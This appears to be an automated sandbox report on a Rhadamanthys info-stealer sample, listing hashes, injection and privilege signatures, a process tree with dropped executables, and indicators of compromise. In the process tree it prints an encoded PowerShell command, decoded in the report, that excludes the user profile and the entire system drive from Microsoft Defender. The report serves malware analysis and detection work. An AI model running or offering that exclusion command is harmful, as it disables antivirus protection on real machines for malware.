Analysis
- max time kernel: 121s
- max time network: 126s
- platform: windows7_x64
- resource: win7-20240221-en
- resource tags: arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
- submitted: 05-04-2024 01:05
Static task: static1
Behavioral task: behavioral1
- Sample: 0518892b68d9401cee558e0615322ba2a902d759e36b315a55fe7238aff71d72.exe
- Resource: win7-20240221-en
Behavioral task: behavioral2
- Sample: 0518892b68d9401cee558e0615322ba2a902d759e36b315a55fe7238aff71d72.exe
- Resource: win10v2004-20240226-en
General
- Target: 0518892b68d9401cee558e0615322ba2a902d759e36b315a55fe7238aff71d72.exe
- Size: 597KB
- MD5: d6abeeea631ceedc9704b11198ddb305
- SHA1: 32c3d810eef2eefa3e317001657f6e5beb839080
- SHA256: 0518892b68d9401cee558e0615322ba2a902d759e36b315a55fe7238aff71d72
- SHA512: b648a43f3fd6bf9c5594b8d0fa882eacd5714d2b69d295ef8c749ef5cae81846ed148034cc9cbc46912fdc959d83f4d9e9f822552f5ddba5a45c1d4e4150d876
- SSDEEP: 12288:pjImsaOOmzPgf/zaUR58rAfTFIg4biQN9Az+I:pjqOmzIDaG58UfTFwnP
Malware Config
Signatures
- Rhadamanthys
  Rhadamanthys is an info stealer written in C++ first seen in August 2022.
- Suspicious use of NtCreateUserProcessOtherParentProcess (1 IoC)
  Processes:
    description             pid   process      target process
    PID 2548 created 1216   2548  svchost.exe  Explorer.EXE
- Executes dropped EXE (2 IoCs)
  Processes:
    pid   process
    2648  XWormLoader.exe
    2548  svchost.exe
- Loads dropped DLL (8 IoCs)
  Processes:
    pid   process                                                                count
    2360  0518892b68d9401cee558e0615322ba2a902d759e36b315a55fe7238aff71d72.exe  x3
    2496  WerFault.exe                                                           x5
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).
- Program crash (1 IoC)
  Processes:
    pid   pid_target  process       target process
    2496  2648        WerFault.exe  XWormLoader.exe
- Suspicious behavior: EnumeratesProcesses (8 IoCs)
  Processes:
    pid   process         count
    2112  powershell.exe  x1
    2972  powershell.exe  x1
    2548  svchost.exe     x2
    2748  dialer.exe      x4
- Suspicious use of AdjustPrivilegeToken (2 IoCs)
  Processes:
    description              pid   process
    Token: SeDebugPrivilege  2112  powershell.exe
    Token: SeDebugPrivilege  2972  powershell.exe
- Suspicious use of WriteProcessMemory (26 IoCs)
  Processes:
    description                      pid   process                                                                target process   count
    PID 2360 wrote to memory of 2972 2360  0518892b68d9401cee558e0615322ba2a902d759e36b315a55fe7238aff71d72.exe  powershell.exe   x4
    PID 2360 wrote to memory of 2112 2360  0518892b68d9401cee558e0615322ba2a902d759e36b315a55fe7238aff71d72.exe  powershell.exe   x4
    PID 2360 wrote to memory of 2648 2360  0518892b68d9401cee558e0615322ba2a902d759e36b315a55fe7238aff71d72.exe  XWormLoader.exe  x4
    PID 2360 wrote to memory of 2548 2360  0518892b68d9401cee558e0615322ba2a902d759e36b315a55fe7238aff71d72.exe  svchost.exe      x4
    PID 2648 wrote to memory of 2496 2648  XWormLoader.exe                                                        WerFault.exe     x4
    PID 2548 wrote to memory of 2748 2548  svchost.exe                                                            dialer.exe       x6
Processes
- C:\Windows\Explorer.EXE
  Command line: C:\Windows\Explorer.EXE
  PID: 1216
  - C:\Users\Admin\AppData\Local\Temp\0518892b68d9401cee558e0615322ba2a902d759e36b315a55fe7238aff71d72.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\0518892b68d9401cee558e0615322ba2a902d759e36b315a55fe7238aff71d72.exe"
    Signatures: Loads dropped DLL; Suspicious use of WriteProcessMemory
    PID: 2360
    - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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"
      Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
      PID: 2972
    - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGoAaQB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG0AcgBoACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHcAagBiACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHgAcABnACMAPgA="
      (The base64 is UTF-16LE and decodes to: <#jix#>Add-MpPreference <#mrh#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#wjb#> -Force <#xpg#>, i.e. a Microsoft Defender exclusion for the user profile and the entire system drive, padded with empty comment blocks.)
      Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
      PID: 2112
    - C:\Users\Admin\AppData\Local\Temp\XWormLoader.exe
      Command line: "C:\Users\Admin\AppData\Local\Temp\XWormLoader.exe"
      Signatures: Executes dropped EXE; Suspicious use of WriteProcessMemory
      PID: 2648
      - C:\Windows\SysWOW64\WerFault.exe
        Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 2648 -s 572
        Signatures: Loads dropped DLL; Program crash
        PID: 2496
    - C:\Users\Admin\AppData\Local\Temp\svchost.exe
      Command line: "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
      Signatures: Suspicious use of NtCreateUserProcessOtherParentProcess; Executes dropped EXE; Suspicious behavior: EnumeratesProcesses; Suspicious use of WriteProcessMemory
      PID: 2548
  - C:\Windows\SysWOW64\dialer.exe
    Command line: "C:\Windows\system32\dialer.exe"
    Signatures: Suspicious behavior: EnumeratesProcesses
    PID: 2748
Network
MITRE ATT&CK Enterprise v15
Downloads
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\147PLU7VQRBKJ61YDX6Z.temp
  Filesize: 7KB
  MD5: 765f2824d7b355aaefc7edb3c36c7deb
  SHA1: 744b78dbbb95dc7ddb7a4453004d826d0216b017
  SHA256: d0fc284651c5d8c026105f058495b34b90b3c11e988939918a1270482c0464cd
  SHA512: e26b5cf22172a27821a2fcc86fa12a4c434477c426376ebc0c345eb1ab6037a719481ef9767bc24a84e6ea0e5b81d2c6d0890b79c27033a5f138020b7f085233
- Filesize: 101KB
  MD5: 39d81ca537ceb52632fbb2e975c3ee2f
  SHA1: 0a3814bd3ccea28b144983daab277d72313524e4
  SHA256: 76c4d61afdebf279316b40e1ca3c56996b16d760aa080d3121d6982f0e61d8e7
  SHA512: 18f7acf9e7b992e95f06ab1c96f017a6e7acde36c1e7c1ff254853a1bfcde65abcdaa797b36071b9349e83aa2c0a45c6dfb2d637c153b53c66fc92066f6d4f9a
- Filesize: 355KB
  MD5: 2ef91bf37b3da8cad6751b665bd4e6af
  SHA1: 5c15bbc721f91855388861d378cf9d26a140cead
  SHA256: 5263ecab05efc0fda51526658fdfa446f6108c009b8c2ddc9dd93ba29ea691b7
  SHA512: 16f1846fde3d65413d1c478b59761cb5b74c5fa4556c7234858010efc05e81e305c9054895e388e9de85f6a55d05d6ac0236ed85dcdce3b82b0a82b4986eb2a3